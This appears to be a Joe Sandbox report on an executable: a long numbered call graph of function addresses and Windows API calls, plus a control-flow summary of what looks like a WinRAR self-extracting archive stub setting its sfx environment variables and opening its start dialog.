24337->24567 24338->24299 24347 36e617 53 API calls 24339->24347 24344 37be79 24340->24344 24342->24329 24346 37b90c TranslateMessage DispatchMessageW 24342->24346 24349 36e617 53 API calls 24344->24349 24346->24329 24348 37ba17 24347->24348 24352 364092 _swprintf 51 API calls 24348->24352 24376 37be9c _wcslen 24349->24376 24350 37bff0 24351 37c020 24350->24351 24356 36e617 53 API calls 24350->24356 24357 37c0d8 24351->24357 24363 37c73f 97 API calls 24351->24363 24358 37ba29 24352->24358 24353 37b9d9 24471 36a0b1 24353->24471 24355 37c73f 97 API calls 24355->24350 24362 37c003 SetDlgItemTextW 24356->24362 24365 37c18b 24357->24365 24399 37c169 24357->24399 24408 36e617 53 API calls 24357->24408 24364 37d4d4 16 API calls 24358->24364 24360 37ba73 24477 37ac04 SetCurrentDirectoryW 24360->24477 24361 37ba68 GetLastError 24361->24360 24366 36e617 53 API calls 24362->24366 24368 37c03b 24363->24368 24364->24353 24369 37c194 EnableWindow 24365->24369 24370 37c19d 24365->24370 24371 37c017 SetDlgItemTextW 24366->24371 24381 37c04d 24368->24381 24390 37c072 24368->24390 24369->24370 24378 37c1ba 24370->24378 24585 3612d3 GetDlgItem EnableWindow 24370->24585 24371->24351 24372 37ba87 24379 37ba9e 24372->24379 24380 37ba90 GetLastError 24372->24380 24373 36e617 53 API calls 24373->24299 24374 37c0cb 24383 37c73f 97 API calls 24374->24383 24386 36e617 53 API calls 24376->24386 24409 37beed 24376->24409 24377 37c1e1 24377->24299 24394 36e617 53 API calls 24377->24394 24378->24377 24392 37c1d9 SendMessageW 24378->24392 24384 37bb11 24379->24384 24388 37bb20 24379->24388 24393 37baae GetTickCount 24379->24393 24380->24379 24583 379ed5 32 API calls 24381->24583 24382 37c1b0 24586 3612d3 GetDlgItem EnableWindow 24382->24586 24383->24357 24387 37bd56 24384->24387 24384->24388 24395 37bed0 24386->24395 24486 3612f1 GetDlgItem ShowWindow 24387->24486 24396 37bcfb 24388->24396 24397 37bcf1 24388->24397 24398 37bb39 GetModuleFileNameW 24388->24398 24389 37c066 24389->24390 24390->24374 24413 37c73f 97 API calls 24390->24413 24392->24377 24401 364092 _swprintf 51 API calls 24393->24401 24394->24330 24402 364092 _swprintf 51 API calls 24395->24402 24405 36e617 53 API calls 24396->24405 24397->24308 24397->24396 24577 36f28c 82 API calls 24398->24577 24584 379ed5 32 API calls 24399->24584 24407 37bac7 24401->24407 24402->24409 24412 37bd05 24405->24412 24406 37bd66 24487 3612f1 GetDlgItem ShowWindow 24406->24487 24478 36966e 24407->24478 24408->24357 24409->24373 24410 37bb5f 24415 364092 _swprintf 51 API calls 24410->24415 24411 37c188 24411->24365 24416 364092 _swprintf 51 API calls 24412->24416 24417 37c0a0 24413->24417 24419 37bb81 CreateFileMappingW 24415->24419 24420 37bd23 24416->24420 24417->24374 24421 37c0a9 DialogBoxParamW 24417->24421 24418 37bd70 24422 36e617 53 API calls 24418->24422 24425 37bbe3 GetCommandLineW 24419->24425 24454 37bc60 __InternalCxxFrameHandler 24419->24454 24434 36e617 53 API calls 24420->24434 24421->24308 24421->24374 24426 37bd7a SetDlgItemTextW 24422->24426 24424 37baed 24428 37baf4 GetLastError 24424->24428 24429 37baff 24424->24429 24430 37bbf4 24425->24430 24488 3612f1 GetDlgItem ShowWindow 24426->24488 24428->24429 24432 36959a 80 API calls 24429->24432 24578 37b425 SHGetMalloc 24430->24578 24431 37bd8c SetDlgItemTextW GetDlgItem 24435 37bdc1 24431->24435 24436 37bda9 GetWindowLongW SetWindowLongW 24431->24436 24432->24384 24438 37bd3d 24434->24438 24489 37c73f 24435->24489 24436->24435 24437 37bc10 24579 37b425 SHGetMalloc 24437->24579 24442 37bc1c 24580 37b425 SHGetMalloc 24442->24580 24443 37c73f 97 API calls 24445 37bddd 24443->24445 24514 37da52 24445->24514 24446 37bc28 24581 36f3fa 82 API calls 2 library calls 24446->24581 24447 37bccb 24447->24397 24453 37bce1 UnmapViewOfFile CloseHandle 24447->24453 24451 37bc3f MapViewOfFile 24451->24454 24452 37c73f 97 API calls 24458 37be03 24452->24458 24453->24397 24454->24447 24455 37bcb7 Sleep 24454->24455 24455->24447 24455->24454 24456 37be2c 24582 3612d3 GetDlgItem EnableWindow 24456->24582 24458->24456 24460 37c73f 97 API calls 24458->24460 24459->24308 24459->24331 24460->24456 24462 36131f 24461->24462 24463 361378 24461->24463 24465 361385 24462->24465 24587 36e2e8 62 API calls 2 library calls 24462->24587 24588 36e2c1 GetWindowLongW SetWindowLongW 24463->24588 24465->24299 24465->24300 24465->24301 24467 361341 24467->24465 24468 361354 GetDlgItem 24467->24468 24468->24465 24469 361364 24468->24469 24469->24465 24470 36136a SetWindowTextW 24469->24470 24470->24465 24473 36a0bb 24471->24473 24472 36a175 24472->24360 24472->24361 24473->24472 24474 36a14c 24473->24474 24589 36a2b2 24473->24589 24474->24472 24475 36a2b2 8 API calls 24474->24475 24475->24472 24477->24372 24479 369678 24478->24479 24480 3696d5 CreateFileW 24479->24480 24481 3696c9 24479->24481 24480->24481 24482 36bb03 GetCurrentDirectoryW 24481->24482 24484 36971f 24481->24484 24483 369704 24482->24483 24483->24484 24485 369708 CreateFileW 24483->24485 24484->24424 24485->24484 24486->24406 24487->24418 24488->24431 24490 37c749 __EH_prolog 24489->24490 24491 37bdcf 24490->24491 24621 37b314 24490->24621 24491->24443 24494 37b314 ExpandEnvironmentStringsW 24503 37c780 _wcslen _wcsrchr 24494->24503 24495 37ca67 SetWindowTextW 24495->24503 24500 37c855 SetFileAttributesW 24501 37c90f GetFileAttributesW 24500->24501 24513 37c86f __cftof _wcslen 24500->24513 24501->24503 24505 37c921 DeleteFileW 24501->24505 24503->24491 24503->24494 24503->24495 24503->24500 24506 37cc31 GetDlgItem SetWindowTextW SendMessageW 24503->24506 24510 37cc71 SendMessageW 24503->24510 24625 371fbb CompareStringW 24503->24625 24626 37a64d GetCurrentDirectoryW 24503->24626 24628 36a5d1 6 API calls 24503->24628 24629 36a55a FindClose 24503->24629 24630 37b48e 76 API calls 2 library calls 24503->24630 24631 383e3e 24503->24631 24505->24503 24507 37c932 24505->24507 24506->24503 24508 364092 _swprintf 51 API calls 24507->24508 24509 37c952 GetFileAttributesW 24508->24509 24509->24507 24511 37c967 MoveFileW 24509->24511 24510->24503 24511->24503 24512 37c97f MoveFileExW 24511->24512 24512->24503 24513->24501 24513->24503 24627 36b991 51 API calls 3 library calls 24513->24627 24515 37da5c __EH_prolog 24514->24515 24646 370659 24515->24646 24517 37da8d 24650 365b3d 24517->24650 24519 37daab 24654 367b0d 24519->24654 24523 37dafe 24670 367b9e 24523->24670 24525 37bdee 24525->24452 24527 37d6a8 24526->24527 24528 37a5c6 4 API calls 24527->24528 24529 37d6ad 24528->24529 24530 37bf15 24529->24530 24531 37d6b5 GetWindow 24529->24531 24530->24309 24530->24310 24531->24530 24534 37d6d5 24531->24534 24532 37d6e2 GetClassNameW 25147 371fbb CompareStringW 24532->25147 24534->24530 24534->24532 24535 37d706 GetWindowLongW 24534->24535 24536 37d76a GetWindow 24534->24536 24535->24536 24537 37d716 SendMessageW 24535->24537 24536->24530 24536->24534 24537->24536 24538 37d72c GetObjectW 24537->24538 25148 37a605 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24538->25148 24541 37d743 25149 37a5e4 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 24541->25149 25150 37a80c 8 API calls 24541->25150 24543 37d754 SendMessageW DeleteObject 24543->24536 24544->24320 24546 37abf1 24545->24546 24547 37abcc 24545->24547 24548 37abf6 SHAutoComplete 24546->24548 24549 37abff 24546->24549 25151 371fbb CompareStringW 24547->25151 24548->24549 24553 37b093 24549->24553 24551 37abdf 24551->24546 24552 37abe3 FindWindowExW 24551->24552 24552->24546 24554 37b09d __EH_prolog 24553->24554 24555 3613dc 84 API calls 24554->24555 24556 37b0bf 24555->24556 25152 361fdc 24556->25152 24559 37b0eb 24562 3619af 128 API calls 24559->24562 24560 37b0d9 24561 361692 86 API calls 24560->24561 24563 37b0e4 24561->24563 24565 37b10d __InternalCxxFrameHandler ___std_exception_copy 24562->24565 24563->24350 24563->24355 24564 361692 86 API calls 24564->24563 24565->24564 24566->24330 25160 37b568 PeekMessageW 24567->25160 24570 37d536 SendMessageW SendMessageW 24572 37d572 24570->24572 24573 37d591 SendMessageW SendMessageW SendMessageW 24570->24573 24571 37d502 24574 37d50d ShowWindow SendMessageW SendMessageW 24571->24574 24572->24573 24575 37d5e7 SendMessageW 24573->24575 24576 37d5c4 SendMessageW 24573->24576 24574->24570 24575->24353 24576->24575 24577->24410 24578->24437 24579->24442 24580->24446 24581->24451 24582->24459 24583->24389 24584->24411 24585->24382 24586->24378 24587->24467 24588->24465 24590 36a2bf 24589->24590 24591 36a2e3 24590->24591 24592 36a2d6 CreateDirectoryW 24590->24592 24610 36a231 24591->24610 24592->24591 24594 36a316 24592->24594 24597 36a325 24594->24597 24602 36a4ed 24594->24602 24596 36a329 GetLastError 24596->24597 24597->24473 24598 36bb03 GetCurrentDirectoryW 24600 36a2ff 24598->24600 24600->24596 24601 36a303 CreateDirectoryW 24600->24601 24601->24594 24601->24596 24603 37ec50 24602->24603 24604 36a4fa SetFileAttributesW 24603->24604 24605 36a510 24604->24605 24606 36a53d 24604->24606 24607 36bb03 GetCurrentDirectoryW 24605->24607 24606->24597 24608 36a524 24607->24608 24608->24606 24609 36a528 SetFileAttributesW 24608->24609 24609->24606 24613 36a243 24610->24613 24614 37ec50 24613->24614 24615 36a250 GetFileAttributesW 24614->24615 24616 36a261 24615->24616 24617 36a23a 24615->24617 24618 36bb03 GetCurrentDirectoryW 24616->24618 24617->24596 24617->24598 24619 36a275 24618->24619 24619->24617 24620 36a279 GetFileAttributesW 24619->24620 24620->24617 24623 37b31e 24621->24623 24622 37b40d 24622->24503 24623->24622 24624 37b3f0 ExpandEnvironmentStringsW 24623->24624 24624->24622 24625->24503 24626->24503 24627->24513 24628->24503 24629->24503 24630->24503 24632 388e54 24631->24632 24633 388e6c 24632->24633 24634 388e61 24632->24634 24636 388e74 24633->24636 24642 388e7d _abort 24633->24642 24635 388e06 __vsnwprintf_l 21 API calls 24634->24635 24641 388e69 24635->24641 24639 388dcc _free 20 API calls 24636->24639 24637 388e82 24644 3891a8 20 API calls _abort 24637->24644 24638 388ea7 HeapReAlloc 24638->24641 24638->24642 24639->24641 24641->24503 24642->24637 24642->24638 24645 387a5e 7 API calls 2 library calls 24642->24645 24644->24641 24645->24642 24647 370666 _wcslen 24646->24647 24674 3617e9 24647->24674 24649 37067e 24649->24517 24651 370659 _wcslen 24650->24651 24652 3617e9 78 API calls 24651->24652 24653 37067e 24652->24653 24653->24519 24655 367b17 __EH_prolog 24654->24655 24691 36ce40 24655->24691 24657 367b32 24658 37eb38 8 API calls 24657->24658 24659 367b5c 24658->24659 24697 374a76 24659->24697 24662 367c7d 24663 367c87 24662->24663 24664 367cf1 24663->24664 24726 36a56d 24663->24726 24668 367d50 24664->24668 24704 368284 24664->24704 24666 367d92 24666->24523 24668->24666 24732 36138b 74 API calls 24668->24732 24671 367bac 24670->24671 24673 367bb3 24670->24673 24672 372297 86 API calls 24671->24672 24672->24673 24675 3617ff 24674->24675 24686 36185a __InternalCxxFrameHandler 24674->24686 24676 361828 24675->24676 24687 366c36 76 API calls __vswprintf_c_l 24675->24687 24678 361887 24676->24678 24683 361847 ___std_exception_copy 24676->24683 24680 383e3e 22 API calls 24678->24680 24679 36181e 24688 366ca7 75 API calls 24679->24688 24682 36188e 24680->24682 24682->24686 24690 366ca7 75 API calls 24682->24690 24683->24686 24689 366ca7 75 API calls 24683->24689 24686->24649 24687->24679 24688->24676 24689->24686 24690->24686 24692 36ce4a __EH_prolog 24691->24692 24693 37eb38 8 API calls 24692->24693 24694 36ce8d 24693->24694 24695 37eb38 8 API calls 24694->24695 24696 36ceb1 24695->24696 24696->24657 24698 374a80 __EH_prolog 24697->24698 24699 37eb38 8 API calls 24698->24699 24700 374a9c 24699->24700 24701 367b8b 24700->24701 24703 370e46 80 API calls 24700->24703 24701->24662 24703->24701 24705 36828e __EH_prolog 24704->24705 24733 3613dc 24705->24733 24707 3682aa 24708 3682bb 24707->24708 24876 369f42 24707->24876 24711 3682f2 24708->24711 24741 361a04 24708->24741 24872 361692 24711->24872 24714 368389 24760 368430 24714->24760 24718 3683e8 24768 361f6d 24718->24768 24721 3682ee 24721->24711 24721->24714 24724 36a56d 7 API calls 24721->24724 24880 36c0c5 CompareStringW _wcslen 24721->24880 24722 3683f3 24722->24711 24772 363b2d 24722->24772 24784 36848e 24722->24784 24724->24721 24727 36a582 24726->24727 24731 36a5b0 24727->24731 25136 36a69b 24727->25136 24729 36a592 24730 36a597 FindClose 24729->24730 24729->24731 24730->24731 24731->24663 24732->24666 24734 3613e1 __EH_prolog 24733->24734 24735 36ce40 8 API calls 24734->24735 24736 361419 24735->24736 24737 37eb38 8 API calls 24736->24737 24740 361474 __cftof 24736->24740 24738 361461 24737->24738 24738->24740 24881 36b505 24738->24881 24740->24707 24742 361a0e __EH_prolog 24741->24742 24754 361a61 24742->24754 24756 361b9b 24742->24756 24897 3613ba 24742->24897 24745 361bc7 24900 36138b 74 API calls 24745->24900 24747 363b2d 101 API calls 24750 361c12 24747->24750 24748 361bd4 24748->24747 24748->24756 24749 361c5a 24753 361c8d 24749->24753 24749->24756 24901 36138b 74 API calls 24749->24901 24750->24749 24752 363b2d 101 API calls 24750->24752 24752->24750 24753->24756 24758 369e80 79 API calls 24753->24758 24754->24745 24754->24748 24754->24756 24755 363b2d 101 API calls 24757 361cde 24755->24757 24756->24721 24757->24755 24757->24756 24758->24757 24759 369e80 79 API calls 24759->24754 24919 36cf3d 24760->24919 24762 368440 24923 3713d2 GetSystemTime SystemTimeToFileTime 24762->24923 24764 3683a3 24764->24718 24765 371b66 24764->24765 24924 37de6b 24765->24924 24769 361f72 __EH_prolog 24768->24769 24771 361fa6 24769->24771 24932 3619af 24769->24932 24771->24722 24773 363b3d 24772->24773 24774 363b39 24772->24774 24783 369e80 79 API calls 24773->24783 24774->24722 24775 363b4f 24776 363b6a 24775->24776 24777 363b78 24775->24777 24778 363baa 24776->24778 25062 3632f7 89 API calls 2 library calls 24776->25062 25063 36286b 101 API calls 3 library calls 24777->25063 24778->24722 24781 363b76 24781->24778 25064 3620d7 74 API calls 24781->25064 24783->24775 24785 368498 __EH_prolog 24784->24785 24788 3684d5 24785->24788 24799 368513 24785->24799 25089 378c8d 103 API calls 24785->25089 24787 3684f5 24789 36851c 24787->24789 24790 3684fa 24787->24790 24788->24787 24793 36857a 24788->24793 24788->24799 24789->24799 25091 378c8d 103 API calls 24789->25091 24790->24799 25090 367a0d 152 API calls 24790->25090 24793->24799 25065 365d1a 24793->25065 24795 368605 24795->24799 25071 368167 24795->25071 24798 368797 24800 36a56d 7 API calls 24798->24800 24801 368802 24798->24801 24799->24722 24800->24801 25077 367c0d 24801->25077 24803 36d051 82 API calls 24809 36885d 24803->24809 24804 36898b 25094 362021 74 API calls 24804->25094 24805 368a5f 24810 368ab6 24805->24810 24824 368a6a 24805->24824 24806 368992 24806->24805 24812 3689e1 24806->24812 24809->24799 24809->24803 24809->24804 24809->24806 25092 368117 84 API calls 24809->25092 25093 362021 74 API calls 24809->25093 24816 368a4c 24810->24816 25097 367fc0 97 API calls 24810->25097 24811 368ab4 24817 36959a 80 API calls 24811->24817 24813 368b14 24812->24813 24812->24816 24818 36a231 3 API calls 24812->24818 24814 368b82 24813->24814 24861 369105 24813->24861 25098 3698bc 24813->25098 24822 36ab1a 8 API calls 24814->24822 24815 36959a 80 API calls 24815->24799 24816->24811 24816->24813 24817->24799 24820 368a19 24818->24820 24820->24816 25095 3692a3 97 API calls 24820->25095 24825 368bd1 24822->24825 24824->24811 25096 367db2 101 API calls 24824->25096 24827 36ab1a 8 API calls 24825->24827 24845 368be7 24827->24845 24830 368b70 25102 366e98 77 API calls 24830->25102 24832 368cbc 24833 368e40 24832->24833 24834 368d18 24832->24834 24837 368e66 24833->24837 24838 368e52 24833->24838 24852 368d49 24833->24852 24835 368d8a 24834->24835 24836 368d28 24834->24836 24842 368167 19 API calls 24835->24842 24839 368d6e 24836->24839 24846 368d37 24836->24846 24841 373377 75 API calls 24837->24841 24840 369215 123 API calls 24838->24840 24839->24852 25105 3677b8 111 API calls 24839->25105 24840->24852 24843 368e7f 24841->24843 24847 368dbd 24842->24847 25108 373020 123 API calls 24843->25108 24844 368c93 24844->24832 25103 369a3c 82 API calls 24844->25103 24845->24832 24845->24844 24853 36981a 79 API calls 24845->24853 25104 362021 74 API calls 24846->25104 24847->24852 24854 368de6 24847->24854 24855 368df5 24847->24855 24860 368f85 24852->24860 25109 362021 74 API calls 24852->25109 24853->24844 25106 367542 85 API calls 24854->25106 25107 369155 93 API calls __EH_prolog 24855->25107 24859 369090 24859->24861 24863 36a4ed 3 API calls 24859->24863 24860->24859 24860->24861 24862 36903e 24860->24862 25083 369f09 SetEndOfFile 24860->25083 24861->24815 25084 369da2 24862->25084 24866 3690eb 24863->24866 24866->24861 25110 362021 74 API calls 24866->25110 24867 369085 24869 369620 77 API calls 24867->24869 24869->24859 24870 3690fb 25111 366dcb 76 API calls _wcschr 24870->25111 24873 3616a4 24872->24873 25127 36cee1 24873->25127 24877 369f59 24876->24877 24878 369f63 24877->24878 25135 366d0c 78 API calls 24877->25135 24878->24708 24880->24721 24882 36b50f __EH_prolog 24881->24882 24887 36f1d0 82 API calls 24882->24887 24884 36b521 24888 36b61e 24884->24888 24887->24884 24889 36b630 __cftof 24888->24889 24892 3710dc 24889->24892 24895 37109e GetCurrentProcess GetProcessAffinityMask 24892->24895 24896 36b597 24895->24896 24896->24740 24902 361732 24897->24902 24899 3613d6 24899->24759 24900->24756 24901->24753 24903 361748 24902->24903 24914 3617a0 __InternalCxxFrameHandler 24902->24914 24904 361771 24903->24904 24915 366c36 76 API calls __vswprintf_c_l 24903->24915 24905 3617c7 24904->24905 24911 36178d ___std_exception_copy 24904->24911 24907 383e3e 22 API calls 24905->24907 24909 3617ce 24907->24909 24908 361767 24916 366ca7 75 API calls 24908->24916 24909->24914 24918 366ca7 75 API calls 24909->24918 24911->24914 24917 366ca7 75 API calls 24911->24917 24914->24899 24915->24908 24916->24904 24917->24914 24918->24914 24920 36cf4d 24919->24920 24922 36cf54 24919->24922 24921 36981a 79 API calls 24920->24921 24921->24922 24922->24762 24923->24764 24925 37de78 24924->24925 24926 36e617 53 API calls 24925->24926 24927 37de9b 24926->24927 24928 364092 _swprintf 51 API calls 24927->24928 24929 37dead 24928->24929 24930 37d4d4 16 API calls 24929->24930 24931 371b7c 24930->24931 24931->24718 24933 3619bb 24932->24933 24934 3619bf 24932->24934 24933->24771 24936 3618f6 24934->24936 24937 361908 24936->24937 24938 361945 24936->24938 24939 363b2d 101 API calls 24937->24939 24944 363fa3 24938->24944 24941 361928 24939->24941 24941->24933 24946 363fac 24944->24946 24945 363b2d 101 API calls 24945->24946 24946->24945 24948 361966 24946->24948 24961 370e08 24946->24961 24948->24941 24949 361e50 24948->24949 24950 361e5a __EH_prolog 24949->24950 24969 363bba 24950->24969 24952 361e84 24953 361732 78 API calls 24952->24953 24955 361f0b 24952->24955 24954 361e9b 24953->24954 24997 3618a9 78 API calls 24954->24997 24955->24941 24957 361eb3 24959 361ebf _wcslen 24957->24959 24998 371b84 MultiByteToWideChar 24957->24998 24999 3618a9 78 API calls 24959->24999 24962 370e0f 24961->24962 24963 370e2a 24962->24963 24967 366c31 RaiseException _com_raise_error 24962->24967 24965 370e3b SetThreadExecutionState 24963->24965 24968 366c31 RaiseException _com_raise_error 24963->24968 24965->24946 24967->24963 24968->24965 24970 363bc4 __EH_prolog 24969->24970 24971 363bf6 24970->24971 24972 363bda 24970->24972 24973 363e51 24971->24973 24977 363c22 24971->24977 25025 36138b 74 API calls 24972->25025 25042 36138b 74 API calls 24973->25042 24976 363be5 24976->24952 24977->24976 25000 373377 24977->25000 24979 363ca3 24980 363d2e 24979->24980 24996 363c9a 24979->24996 25028 36d051 24979->25028 25010 36ab1a 24980->25010 24981 363c9f 24981->24979 25027 3620bd 78 API calls 24981->25027 24983 363c71 24983->24979 24983->24981 24984 363c8f 24983->24984 25026 36138b 74 API calls 24984->25026 24989 363d41 24990 363dd7 24989->24990 24991 363dc7 24989->24991 25034 373020 123 API calls 24990->25034 25014 369215 24991->25014 24994 363dd5 24994->24996 25035 362021 74 API calls 24994->25035 25036 372297 24996->25036 24997->24957 24998->24959 24999->24955 25001 37338c 25000->25001 25002 373396 ___std_exception_copy 25000->25002 25043 366ca7 75 API calls 25001->25043 25004 3734c6 25002->25004 25005 37341c 25002->25005 25009 373440 __cftof 25002->25009 25045 38238d RaiseException 25004->25045 25044 3732aa 75 API calls 3 library calls 25005->25044 25008 3734f2 25009->24983 25011 36ab28 25010->25011 25013 36ab32 25010->25013 25012 37eb38 8 API calls 25011->25012 25012->25013 25013->24989 25015 36921f __EH_prolog 25014->25015 25046 367c64 25015->25046 25018 3613ba 78 API calls 25019 369231 25018->25019 25049 36d114 25019->25049 25021 36928a 25021->24994 25023 36d114 118 API calls 25024 369243 25023->25024 25024->25021 25024->25023 25058 36d300 97 API calls __InternalCxxFrameHandler 25024->25058 25025->24976 25026->24996 25027->24979 25029 36d084 25028->25029 25030 36d072 25028->25030 25060 36603a 82 API calls 25029->25060 25059 36603a 82 API calls 25030->25059 25033 36d07c 25033->24980 25034->24994 25035->24996 25037 3722a1 25036->25037 25038 3722ba 25037->25038 25041 3722ce 25037->25041 25061 370eed 86 API calls 25038->25061 25040 3722c1 25040->25041 25042->24976 25043->25002 25044->25009 25045->25008 25047 36b146 GetVersionExW 25046->25047 25048 367c69 25047->25048 25048->25018 25054 36d12a __InternalCxxFrameHandler 25049->25054 25050 36d29a 25051 36d2ce 25050->25051 25052 36d0cb 6 API calls 25050->25052 25053 370e08 SetThreadExecutionState RaiseException 25051->25053 25052->25051 25056 36d291 25053->25056 25054->25050 25055 378c8d 103 API calls 25054->25055 25054->25056 25057 36ac05 91 API calls 25054->25057 25055->25054 25056->25024 25057->25054 25058->25024 25059->25033 25060->25033 25061->25040 25062->24781 25063->24781 25064->24778 25066 365d2a 25065->25066 25112 365c4b 25066->25112 25068 365d5d 25070 365d95 25068->25070 25117 36b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25068->25117 25070->24795 25072 368186 25071->25072 25073 368232 25072->25073 25124 36be5e 19 API calls __InternalCxxFrameHandler 25072->25124 25123 371fac CharUpperW 25073->25123 25076 36823b 25076->24798 25078 367c22 25077->25078 25079 367c5a 25078->25079 25125 366e7a 74 API calls 25078->25125 25079->24809 25081 367c52 25126 36138b 74 API calls 25081->25126 25083->24862 25085 369db3 25084->25085 25087 369dc2 25084->25087 25086 369db9 FlushFileBuffers 25085->25086 25085->25087 25086->25087 25088 369e3f SetFileTime 25087->25088 25088->24867 25089->24788 25090->24799 25091->24799 25092->24809 25093->24809 25094->24806 25095->24816 25096->24811 25097->24816 25099 3698c5 GetFileType 25098->25099 25100 368b5a 25098->25100 25099->25100 25100->24814 25101 362021 74 API calls 25100->25101 25101->24830 25102->24814 25103->24832 25104->24852 25105->24852 25106->24852 25107->24852 25108->24852 25109->24860 25110->24870 25111->24861 25118 365b48 25112->25118 25114 365c6c 25114->25068 25116 365b48 2 API calls 25116->25114 25117->25068 25120 365b52 25118->25120 25119 365c3a 25119->25114 25119->25116 25120->25119 25122 36b1dc CharUpperW CompareStringW _wcslen ___vcrt_FlsFree 25120->25122 25122->25120 25123->25076 25124->25073 25125->25081 25126->25079 25128 36cef2 25127->25128 25133 36a99e 86 API calls 25128->25133 25130 36cf24 25134 36a99e 86 API calls 25130->25134 25132 36cf2f 25133->25130 25134->25132 25135->24878 25137 36a6a8 25136->25137 25138 36a727 FindNextFileW 25137->25138 25139 36a6c1 FindFirstFileW 25137->25139 25140 36a732 GetLastError 25138->25140 25146 36a709 25138->25146 25141 36a6d0 25139->25141 25139->25146 25140->25146 25142 36bb03 GetCurrentDirectoryW 25141->25142 25143 36a6e0 25142->25143 25144 36a6e4 FindFirstFileW 25143->25144 25145 36a6fe GetLastError 25143->25145 25144->25145 25144->25146 25145->25146 25146->24729 25147->24534 25148->24541 25149->24541 25150->24543 25151->24551 25153 369f42 78 API calls 25152->25153 25154 361fe8 25153->25154 25155 361a04 101 API calls 25154->25155 25158 362005 25154->25158 25156 361ff5 25155->25156 25156->25158 25159 36138b 74 API calls 25156->25159 25158->24559 25158->24560 25159->25158 25161 37b583 GetMessageW 25160->25161 25162 37b5bc GetDlgItem 25160->25162 25163 37b599 IsDialogMessageW 25161->25163 25164 37b5a8 TranslateMessage DispatchMessageW 25161->25164 25162->24570 25162->24571 25163->25162 25163->25164 25164->25162 25165 3613e1 84 API calls 2 library calls 25302 3794e0 GetClientRect 25327 3721e0 26 API calls std::bad_exception::bad_exception 25340 37f2e0 46 API calls __RTC_Initialize 25341 38bee0 GetCommandLineA GetCommandLineW 25328 36f1e8 FreeLibrary 25172 37e2d7 25173 37e1db 25172->25173 25174 37e85d ___delayLoadHelper2@8 14 API calls 25173->25174 25174->25173 25342 380ada 51 API calls 2 library calls 25176 3610d5 25181 365abd 25176->25181 25182 365ac7 __EH_prolog 25181->25182 25183 36b505 84 API calls 25182->25183 25184 365ad3 25183->25184 25188 365cac GetCurrentProcess GetProcessAffinityMask 25184->25188 25303 37f4d3 20 API calls 25189 37e1d1 14 API calls ___delayLoadHelper2@8 25364 38a3d0 21 API calls 2 library calls 25365 392bd0 VariantClear 25256 37dec2 25257 37decf 25256->25257 25258 36e617 53 API calls 25257->25258 25259 37dedc 25258->25259 25260 364092 _swprintf 51 API calls 25259->25260 25261 37def1 SetDlgItemTextW 25260->25261 25262 37b568 5 API calls 25261->25262 25263 37df0e 25262->25263 25330 37b5c0 100 API calls 25366 3777c0 118 API calls 25367 37ffc0 RaiseException _com_raise_error _com_error::_com_error 25345 3762ca 123 API calls __InternalCxxFrameHandler

                                                                                                                                    Control-flow Graph

                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00370863: GetModuleHandleW.KERNEL32(kernel32), ref: 0037087C
                                                                                                                                      • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0037088E
                                                                                                                                      • Part of subcall function 00370863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 003708BF
                                                                                                                                      • Part of subcall function 0037A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0037A655
                                                                                                                                      • Part of subcall function 0037AC16: OleInitialize.OLE32(00000000), ref: 0037AC2F
                                                                                                                                      • Part of subcall function 0037AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0037AC66
                                                                                                                                      • Part of subcall function 0037AC16: SHGetMalloc.SHELL32(003A8438), ref: 0037AC70
                                                                                                                                    • GetCommandLineW.KERNEL32 ref: 0037DF5C
                                                                                                                                    • OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0037DF83
                                                                                                                                    • MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0037DF94
                                                                                                                                    • UnmapViewOfFile.KERNEL32(00000000), ref: 0037DFCE
                                                                                                                                      • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0037DBF4
                                                                                                                                      • Part of subcall function 0037DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0037DC30
                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 0037DFD7
                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,003BEC90,00000800), ref: 0037DFF2
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxname,003BEC90), ref: 0037DFFE
                                                                                                                                    • GetLocalTime.KERNEL32(?), ref: 0037E009
                                                                                                                                    • _swprintf.LIBCMT ref: 0037E048
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0037E05A
                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000), ref: 0037E061
                                                                                                                                    • LoadIconW.USER32(00000000,00000064), ref: 0037E078
                                                                                                                                    • DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0037E0C9
                                                                                                                                    • Sleep.KERNEL32(?), ref: 0037E0F7
                                                                                                                                    • DeleteObject.GDI32 ref: 0037E130
                                                                                                                                    • DeleteObject.GDI32(?), ref: 0037E140
                                                                                                                                    • CloseHandle.KERNEL32 ref: 0037E183
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
